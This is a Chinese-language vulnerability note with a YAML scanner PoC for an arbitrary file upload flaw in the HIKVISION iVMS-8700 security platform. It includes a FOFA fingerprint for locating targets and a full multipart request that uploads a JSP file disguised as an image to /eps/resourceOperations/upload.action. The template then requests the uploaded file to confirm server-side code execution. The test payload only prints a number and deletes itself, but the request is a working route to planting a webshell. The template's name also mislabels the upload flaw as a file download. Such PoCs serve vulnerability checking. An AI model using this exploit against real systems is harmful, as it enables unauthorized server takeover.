漏洞描述
HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞,攻击者通过发送特定的请求包可以上传Webshell文件控制服务器
FOFA: icon_hash="-911494769"
hikvision-ivms-8700-upload-action-upload: HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载
PoC代码[已公开]
id: hikvision-ivms-8700-upload-action-upload
info:
name: HIKVISION iVMS-8700综合安防管理平台 download 任意文件下载
author: peiqi
severity: high
verified: true
description: |
HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞,攻击者通过发送特定的请求包可以上传Webshell文件控制服务器
FOFA: icon_hash="-911494769"
solutions: HIKVISION iVMS-8700综合安防管理平台
reference:
- https://mp.weixin.qq.com/s?__biz=Mzk0OTM5MTk0OA==&mid=2247492052&idx=1&sn=b158e08a2f69b55bf042c7a66d55dc9d
- https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HIKVISION%20iVMS-8700%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20upload.action%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html
tags: hikvision,ivms8700,download
created: 2023/06/25
set:
randstr: randomLowercase(20)
randbody: randomLowercase(32)
rboundary: randomLowercase(8)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rules:
r0:
request:
method: POST
path: /eps/resourceOperations/upload.action
headers:
user-agent: MicroMessenger
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"fileUploader\";filename=\"{{randstr}}.jsp\"\r\n\
Content-Type: image/jpeg\r\n\
\r\n\
<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'"resourceUuid":')
output:
search: '"\"resourceUuid\":\"(?P<resourceUuid>.+?)\"".bsubmatch(response.body)'
resourceUuid: search["resourceUuid"]
r1:
request:
method: GET
path: /eps/upload/{{resourceUuid}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0()